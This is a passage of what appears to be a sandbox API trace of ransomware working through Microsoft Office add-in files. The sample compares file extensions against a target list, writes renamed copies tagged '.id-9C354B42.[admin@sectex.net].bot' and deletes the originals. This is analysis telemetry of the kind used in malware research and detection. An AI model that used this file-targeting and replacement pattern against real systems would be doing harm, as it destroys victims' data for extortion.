	[0155.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.964] lstrlenW (lpString=".doc") returned 4
	[0155.964] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.964] lstrlenW (lpString=".docx") returned 5
	[0155.964] lstrcmpiW (lpString1=".docx", lpString2="T.ECF") returned -1
	[0155.964] lstrlenW (lpString=".pdf") returned 4
	[0155.964] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.964] lstrlenW (lpString=".xls") returned 4
	[0155.964] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.964] lstrlenW (lpString=".xlsx") returned 5
	[0155.964] lstrcmpiW (lpString1=".xlsx", lpString2="T.ECF") returned -1
	[0155.965] lstrlenW (lpString=".ppt") returned 4
	[0155.965] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString=".zip") returned 4
	[0155.965] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.965] lstrlenW (lpString=".rar") returned 4
	[0155.965] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.965] lstrlenW (lpString=".bz2") returned 4
	[0155.965] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.965] lstrlenW (lpString=".7z") returned 3
	[0155.965] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString=".dbf") returned 4
	[0155.965] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString=".1cd") returned 4
	[0155.965] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString=".jpg") returned 4
	[0155.965] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.965] lstrlenW (lpString=".doc") returned 4
	[0155.965] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.965] lstrlenW (lpString=".docx") returned 5
	[0155.965] lstrcmpiW (lpString1=".docx", lpString2="T.ECF") returned -1
	[0155.965] lstrlenW (lpString=".pdf") returned 4
	[0155.965] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.965] lstrlenW (lpString=".xls") returned 4
	[0155.965] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.966] lstrlenW (lpString=".xlsx") returned 5
	[0155.966] lstrcmpiW (lpString1=".xlsx", lpString2="T.ECF") returned -1
	[0155.966] lstrlenW (lpString=".ppt") returned 4
	[0155.966] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.966] lstrlenW (lpString=".zip") returned 4
	[0155.966] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.966] lstrlenW (lpString=".rar") returned 4
	[0155.966] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.966] lstrlenW (lpString=".bz2") returned 4
	[0155.966] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.966] lstrlenW (lpString=".7z") returned 3
	[0155.966] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.966] lstrlenW (lpString=".dbf") returned 4
	[0155.966] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.966] lstrlenW (lpString=".1cd") returned 4
	[0155.966] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\FAXEXT.ECF") returned 60
	[0155.966] lstrlenW (lpString=".jpg") returned 4
	[0155.966] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0155.966] lstrcmpiW (lpString1=".ECF", lpString2=".bot") returned 1
	[0155.966] lstrlenW (lpString="OUTEX2.ECF") returned 10
	[0155.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0155.973] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=850) returned 1
	[0155.973] CloseHandle (hObject=0x31c) returned 1
	[0155.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf")) returned 0x20
	[0155.973] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0155.973] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.973] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0155.976] GetLastError () returned 0x0
	[0155.976] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x352, lpOverlapped=0x0) returned 1
	[0155.979] WriteFile (in: hFile=0x3cc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x360, lpOverlapped=0x0) returned 1
	[0155.980] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.980] WriteFile (in: hFile=0x3cc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0155.980] SetEndOfFile (hFile=0x3cc) returned 1
	[0155.980] CloseHandle (hObject=0x3cc) returned 1
	[0155.980] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.980] SetEndOfFile (hFile=0x31c) returned 1
	[0155.982] CloseHandle (hObject=0x31c) returned 1
	[0155.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.983] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outex2.ecf")) returned 1
	[0155.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.983] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.983] lstrlenW (lpString=".doc") returned 4
	[0155.983] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.983] lstrlenW (lpString=".docx") returned 5
	[0155.983] lstrcmpiW (lpString1=".docx", lpString2="2.ECF") returned -1
	[0155.983] lstrlenW (lpString=".pdf") returned 4
	[0155.983] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.983] lstrlenW (lpString=".xls") returned 4
	[0155.983] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.983] lstrlenW (lpString=".xlsx") returned 5
	[0155.983] lstrcmpiW (lpString1=".xlsx", lpString2="2.ECF") returned -1
	[0155.983] lstrlenW (lpString=".ppt") returned 4
	[0155.983] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString=".zip") returned 4
	[0155.984] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString=".rar") returned 4
	[0155.984] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString=".bz2") returned 4
	[0155.984] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.984] lstrlenW (lpString=".7z") returned 3
	[0155.984] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString=".dbf") returned 4
	[0155.984] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString=".1cd") returned 4
	[0155.984] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString=".jpg") returned 4
	[0155.984] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.984] lstrlenW (lpString=".doc") returned 4
	[0155.984] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.984] lstrlenW (lpString=".docx") returned 5
	[0155.984] lstrcmpiW (lpString1=".docx", lpString2="2.ECF") returned -1
	[0155.984] lstrlenW (lpString=".pdf") returned 4
	[0155.984] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString=".xls") returned 4
	[0155.984] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.984] lstrlenW (lpString=".xlsx") returned 5
	[0155.984] lstrcmpiW (lpString1=".xlsx", lpString2="2.ECF") returned -1
	[0155.984] lstrlenW (lpString=".ppt") returned 4
	[0155.985] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.985] lstrlenW (lpString=".zip") returned 4
	[0155.985] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.985] lstrlenW (lpString=".rar") returned 4
	[0155.985] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.985] lstrlenW (lpString=".bz2") returned 4
	[0155.985] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.985] lstrlenW (lpString=".7z") returned 3
	[0155.985] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.985] lstrlenW (lpString=".dbf") returned 4
	[0155.985] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.985] lstrlenW (lpString=".1cd") returned 4
	[0155.985] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTEX2.ECF") returned 60
	[0155.985] lstrlenW (lpString=".jpg") returned 4
	[0155.985] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0155.985] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0155.985] lstrlenW (lpString="OUTLVBA.DLL") returned 11
	[0155.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outlvba.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0155.986] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=80760) returned 1
	[0155.986] CloseHandle (hObject=0x31c) returned 1
	[0155.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outlvba.dll")) returned 0x20
	[0155.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outlvba.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\outlvba.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.987] lstrlenW (lpString=".doc") returned 4
	[0155.987] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.987] lstrlenW (lpString=".docx") returned 5
	[0155.987] lstrcmpiW (lpString1=".docx", lpString2="A.DLL") returned -1
	[0155.987] lstrlenW (lpString=".pdf") returned 4
	[0155.987] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.987] lstrlenW (lpString=".xls") returned 4
	[0155.987] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.987] lstrlenW (lpString=".xlsx") returned 5
	[0155.987] lstrcmpiW (lpString1=".xlsx", lpString2="A.DLL") returned -1
	[0155.987] lstrlenW (lpString=".ppt") returned 4
	[0155.987] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.987] lstrlenW (lpString=".zip") returned 4
	[0155.987] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.987] lstrlenW (lpString=".rar") returned 4
	[0155.988] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString=".bz2") returned 4
	[0155.988] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.988] lstrlenW (lpString=".7z") returned 3
	[0155.988] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString=".dbf") returned 4
	[0155.988] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString=".1cd") returned 4
	[0155.988] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString=".jpg") returned 4
	[0155.988] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString=".doc") returned 4
	[0155.988] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString=".docx") returned 5
	[0155.988] lstrcmpiW (lpString1=".docx", lpString2="A.DLL") returned -1
	[0155.988] lstrlenW (lpString=".pdf") returned 4
	[0155.988] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString=".xls") returned 4
	[0155.988] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString=".xlsx") returned 5
	[0155.988] lstrcmpiW (lpString1=".xlsx", lpString2="A.DLL") returned -1
	[0155.988] lstrlenW (lpString=".ppt") returned 4
	[0155.988] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0155.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.988] lstrlenW (lpString=".zip") returned 4
	[0155.988] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0155.989] lstrlenW (lpString=".rar") returned 4
	[0155.989] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0155.989] lstrlenW (lpString=".bz2") returned 4
	[0155.989] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0155.989] lstrlenW (lpString=".7z") returned 3
	[0155.989] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0155.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.989] lstrlenW (lpString=".dbf") returned 4
	[0155.989] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0155.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.989] lstrlenW (lpString=".1cd") returned 4
	[0155.989] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0155.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\OUTLVBA.DLL") returned 61
	[0155.989] lstrlenW (lpString=".jpg") returned 4
	[0155.989] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0155.989] lstrcmpiW (lpString1=".ECF", lpString2=".bot") returned 1
	[0155.989] lstrlenW (lpString="PMAILEXT.ECF") returned 12
	[0155.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0155.990] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=626) returned 1
	[0155.990] CloseHandle (hObject=0x31c) returned 1
	[0155.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf")) returned 0x20
	[0155.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0155.991] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.991] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0155.992] GetLastError () returned 0x0
	[0155.992] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x272, lpOverlapped=0x0) returned 1
	[0155.993] WriteFile (in: hFile=0x3cc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0155.994] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.994] WriteFile (in: hFile=0x3cc, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.994] SetEndOfFile (hFile=0x3cc) returned 1
	[0155.994] CloseHandle (hObject=0x3cc) returned 1
	[0155.994] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.994] SetEndOfFile (hFile=0x31c) returned 1
	[0155.997] CloseHandle (hObject=0x31c) returned 1
	[0155.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.997] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\pmailext.ecf")) returned 1
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString=".doc") returned 4
	[0155.998] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.998] lstrlenW (lpString=".docx") returned 5
	[0155.998] lstrcmpiW (lpString1=".docx", lpString2="T.ECF") returned -1
	[0155.998] lstrlenW (lpString=".pdf") returned 4
	[0155.998] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.998] lstrlenW (lpString=".xls") returned 4
	[0155.998] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.998] lstrlenW (lpString=".xlsx") returned 5
	[0155.998] lstrcmpiW (lpString1=".xlsx", lpString2="T.ECF") returned -1
	[0155.998] lstrlenW (lpString=".ppt") returned 4
	[0155.998] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString=".zip") returned 4
	[0155.998] lstrcmpiW (lpString1=".zip", lpString2=".ECF") returned 1
	[0155.998] lstrlenW (lpString=".rar") returned 4
	[0155.998] lstrcmpiW (lpString1=".rar", lpString2=".ECF") returned 1
	[0155.998] lstrlenW (lpString=".bz2") returned 4
	[0155.998] lstrcmpiW (lpString1=".bz2", lpString2=".ECF") returned -1
	[0155.998] lstrlenW (lpString=".7z") returned 3
	[0155.998] lstrcmpiW (lpString1=".7z", lpString2="ECF") returned -1
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString=".dbf") returned 4
	[0155.998] lstrcmpiW (lpString1=".dbf", lpString2=".ECF") returned -1
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString=".1cd") returned 4
	[0155.998] lstrcmpiW (lpString1=".1cd", lpString2=".ECF") returned -1
	[0155.998] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.998] lstrlenW (lpString=".jpg") returned 4
	[0155.998] lstrcmpiW (lpString1=".jpg", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
	[0155.999] lstrlenW (lpString=".doc") returned 4
	[0155.999] lstrcmpiW (lpString1=".doc", lpString2=".ECF") returned -1
	[0155.999] lstrlenW (lpString=".docx") returned 5
	[0155.999] lstrcmpiW (lpString1=".docx", lpString2="T.ECF") returned -1
	[0155.999] lstrlenW (lpString=".pdf") returned 4
	[0155.999] lstrcmpiW (lpString1=".pdf", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString=".xls") returned 4
	[0155.999] lstrcmpiW (lpString1=".xls", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString=".xlsx") returned 5
	[0155.999] lstrcmpiW (lpString1=".xlsx", lpString2="T.ECF") returned -1
	[0155.999] lstrlenW (lpString=".ppt") returned 4
	[0155.999] lstrcmpiW (lpString1=".ppt", lpString2=".ECF") returned 1
	[0155.999] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\PMAILEXT.ECF") returned 62
